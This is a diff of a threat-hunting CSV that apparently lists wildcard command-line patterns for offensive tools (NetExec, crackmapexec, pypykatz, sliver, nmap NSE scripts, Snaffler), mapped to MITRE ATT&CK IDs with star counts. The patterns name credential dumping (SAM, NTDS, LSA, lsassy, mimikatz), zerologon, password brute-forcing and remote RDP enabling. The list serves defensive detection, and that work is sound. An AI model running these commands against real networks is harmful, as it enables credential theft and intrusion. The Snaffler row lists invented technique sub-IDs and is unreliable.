-"* smb * -u * -p * --wmi ""select Name from win32_computersystem""*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* sliver sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"* smb * --dpapi *password*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * --gen-relay-list *.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * --lsa --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -M lsassy*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M masky -o CA=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M msol *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -M ntlmv1 *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -M rdp -o ACTION=enable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M runasppl*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M zerologon*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * --ntds --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * --sam --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -u * -p * * -M dfscoerce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * * --rid-brute*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * * --shares --filter-shares *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * * -X whoami --obfs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M enum_av*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M enum_dns*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M gpp_password*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M met_inject *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * --wmi ""select Name from win32_computersystem""*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* smb client * shares *use c$*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"* smb -M mimikatz --options*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* smb -M mimikatz --options*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* smb shareenum *smb2+ntlm-password*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"* smb* -u '' -p ''*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* smb* -u '' -p ''*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* smb2-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb2-security-mode.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb2-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1808,7 +1808,7 @@ "* smb-enum-sessions.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* smbexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* smbexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* smb-flood.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-mbenum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1844,8 +1844,8 @@ "* smtp-vuln-cve2011-1720.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-vuln-cve2011-1764.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-vuln-cve2020-28017-through-28026-21nails.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" -"* smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","228","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" -"* snaffler.log*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","0","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"* smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"* snaffler.log*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","0","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" "* sniffer-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-hh3c-logins.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1859,37 +1859,37 @@ "* snmp-win32-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-win32-software.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-win32-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* SocialBox.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"* SocialBox.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" "* socks-auth-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* socks-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* socks-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -Source c:\windows\*.exe -Target *.exe -Sign*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "* -Source c:\windows\system32\*.dll 